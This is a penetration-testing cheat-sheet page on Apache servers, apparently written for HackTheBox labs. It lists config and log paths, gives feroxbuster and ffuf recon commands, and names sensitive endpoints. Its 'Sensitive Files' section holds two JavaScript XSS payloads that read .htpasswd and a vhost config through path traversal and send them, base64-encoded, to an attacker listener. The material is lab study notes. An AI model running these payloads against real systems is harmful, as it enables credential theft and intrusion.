Apache

It uses a process-based model, where each request is handled by a separate thread or process, which can be resource-heavy under high traffic but provides great compatibility.

Configuration Files
Standard
/etc/apache2/apache2.conf
RHEL
/etc/httpd/httpd.conf
FreeBSD
/etc/apache24/httpd.conf
vhost
/etc/apache2/sites-enabled/000-default.conf
Modules
/etc/apache2/mods-available/
Initial Recon

  • If you are lucky you may be able to find /sites-enabled and /sites-available or even logs: 

feroxbuster -u http://URL.htb -w ~/Documents/Wordlists/default-web-root-directory-linux.txt --output urls.txt --redirects

  • robots.txt can reveal pages that the server is hiding.

  • Fuzz for vhosts at sight of 301 responses.

Ffuf
ffuf -c -w ~/Documents/Wordlists/subdomains-top1million-20000.txt -u http://SITE/ -H "Host: FUZZ.URL.htb" -fc 301 -ac

  • /cgi-bin/: Directory for executing CGI scripts.

  • /icons/: Often used for directory listings. It may expose unintended file paths.

  • phpinfo.php: Disclose sensitive server and PHP configuration details.

Authentication/Authorization

Authentication

  • .htaccess: Configures directory-specific rules for authentication and other settings.

  • .htpasswd: Stores user credentials for basic authentication.

Standard Modules

mod_status

/server-status: Real-time status and diagnostic information about the server, including active requests, resource usage, and server performance.

/server-info: Server health and performance monitoring.

PHP Modules

To Allow PHP execution you need to add this line to /etc/apache2/apache2.conf:

LoadModule php_module /usr/lib/apache2/modules/libphp.so
    AddType application/x-httpd-php .php

  • You can actually add any extension that you want:

AddType application/x-httpd-php .l33t
Sensitive Files
Authorization File
var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText),
true);
req2.send();
Default config file
var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText),
true);
req2.send();

Logs

  • Access Logs:

    • /var/log/apache2/access.log

    • /var/log/httpd/access_log

  • Error logs:

    • /var/log/apache2/error.log

    • /var/log/httpd/error_log

PreviousWeb ServersNextNginx

Last updated